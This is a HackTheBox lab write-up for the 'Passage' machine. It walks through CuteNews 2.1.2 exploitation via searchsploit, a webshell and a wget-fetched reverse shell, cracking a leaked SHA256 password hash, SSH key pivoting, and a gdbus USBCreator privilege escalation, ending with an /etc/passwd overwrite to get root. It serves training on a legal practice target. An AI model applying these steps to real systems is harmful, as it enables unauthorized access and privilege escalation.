Box link

https://www.hackthebox.eu/home/machines/profile/275

Summary

This box had a CVE as foothold. After making the exploit work, I had to enumerate files on the system to get to user. Next step was horizontal privesc to another user, then an unusual way to privesc to root via gdbus and USBcreator.

Exploring the target

First things first, after deploying the box and getting an IP, I started with an nmap scan. In fact, I usually run 2 nmap scans, one to quickly grab the open ports, then one to enumerate the running services in more details, so I’ve ran the following two commands:

1

nmap -sS -T4 -Pn <IP>

To grab the open ports, then:

1

nmap -sC -sV -Pn -T4 -p <PORTS I GOT FROM PREV SCAN> <IP>

To enumerate service headers and versions.

This gave us the following result:
Nmap result

Foothold

After nmap, it was pretty obvious we have to direct our attention to the Apache server running on 80, since the only other port open was ssh, which isn’t vulnerable and we have no information about credentials. After opening the webpage in a browser, it looked like it is some kind of a news site which even had RSS. I always check the source, did the same this time, and the mailto functionality leaked the domain name: passge.htb and a possible username I took note of, called: nadav.

I’ve added the ip-domain pair to /etc/hosts. Still reading the source, we can see tons and tons of links pointing to the /CuteNews path. It’s in the CSS file path, JS path, etc. If we actually open the link: http://passage.htb/CuteNews, we can see a login form, and the fact that CuteNews is a news management system, it’s like a “wordpress for news”. I’ve tried to login with nadav with simple passwords, but it didn’t work. Next step, I’ve looked up CuteNews with searchsploit, and saw that there are quite a few exploits out there, which was looking very promising. The site even leaks its version number in the footer, it’s version 2.1.2.

Initially when doing the box I’ve decided to use the exploit at php/webapps/48458.txt. Can mirror it with:

1

searchsploit -m php/webapps/48458.txt

This is an instruction set about uploading a file, so basically following this, we can upload a PHP shell for RCE. I added a php shell to a png image with exiftool, changed the .png extension to .php in burp, then the shell was uploaded.

Now that I’m doing the writeup, I’ve decided to use php/webapps/48800.py instead. I think when the box came out this exploit either didn’t work, or wasn’t aviable, not sure, but it does work now, and running it is a lot easier than going through the work of actually crafting an image based php webshell. Can once again mirror it by running:

1

searchsploit -m php/webapps/48800.py

I’ve just ran the exploit with

1

python3 48800.py

And when it asks for an URL, just give the root path, so type:

1

http://passage.htb

and it should work. This drops us into a shell on the machine, as the user www-data. I did open a bash reverse shell instead, since this exploit shell felt a bit unstable. Basically I wget-ed a bash script with a revshell and ran it with bash. Don’t forget to open a listener on the attack box!

User

Checking out the home directory, we can see two users: paul and nadav.
One should always enumerate the webserver folder for possible usernames, passwords, database login information, hashes and stuff like that. This is exactly how I found the next clue, which was in an interesting file at /var/www/html/CuteNews/cdata/users/lines.

This had some data stored in base64. I decoded these, and found one that had paul in it, this looked interesting because paul is a user on the system as we saw just now. These base64 encoded messages had SHA256 encrypted password hashes in them, for nadav and also for paul. I couldn’t crack the nadav one, but the paul one did crack pretty fast with rockyou and john.

The relevant b64-ed message:

1

YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19

decoded:

1

a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}

The hash part that I cracked:

1

e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd

This is SHA256, you can either tell this by looking at it, or by starting john on it without paramteres which will give you suggestions, or by running hash-identifier on it.

First I echo-ed it to a file, I usually echo with the -n switch, because that way it won’t put a newline to the end of the line, which sometimes can cause problems (usually with encoding / encryption):

1

echo -n e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd > hash.john

After this, I just ran john with the proper format and wordlist parameter and it cracked the hash in less than a second:

1

john --format=Raw-SHA256 -w=/usr/share/wordlists/rockyou.txt

The cracked password is: atlanta1

Since this was associated with paul in the b64 encoded message, we can try to ssh in with paul, to see that password authentication is disabled. Oh, well we can just su into the account from our www-data user.

This meant we got the user flag!

Root

First of all, to be able to root I had to become nadav first. This part took quite a while, I’ve found this a little bit guessy, but it wasn’t so horrible. Basically after looking around quite a bit, we can see that in our .ssh folder nadav's ssh key is added to the authorized_keys file. We do need to make an assumption here based on this, that probably paul's ssh key is also added to nadav's authorized_keys. If this is the case, we should be able to log in as nadav by running the following on the victim:

1

ssh nadav@localhost

We are in as nadav!

I’ve done lots of root enumeration, but didn’t find anything usual like hidden files, backups, SUIDs and things like these. There was one interesting service running: USBcreator (As it turns out, this was only running because someone was also doing the box at the same time, since I did it on release. One could still find out about this privesc method by enumerating the .cache folder in nadav’s home folder, or by viewing the vim history file.).

The following article is a great writeup on this vulnerability: https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

This is also a great article, we can see the .ibus folder in .cache in the home folder https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation

The final payload I used was:

1

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /tmp/.a/result.txt true

After running this, the root.txt file got copied into /tmp, and we could read its content.

One might wonder how to get a root shell if someone wanted to, with this method, since we can only copy files as root. Well, one way is to copy the /etc/passwd file with our user to f.e. /tmp, then add a new user to it with root privileges and a password hash, then overwirte the original passwd file on the system. Now we can log in as the newly added user, and bamm, we are root in a root shell.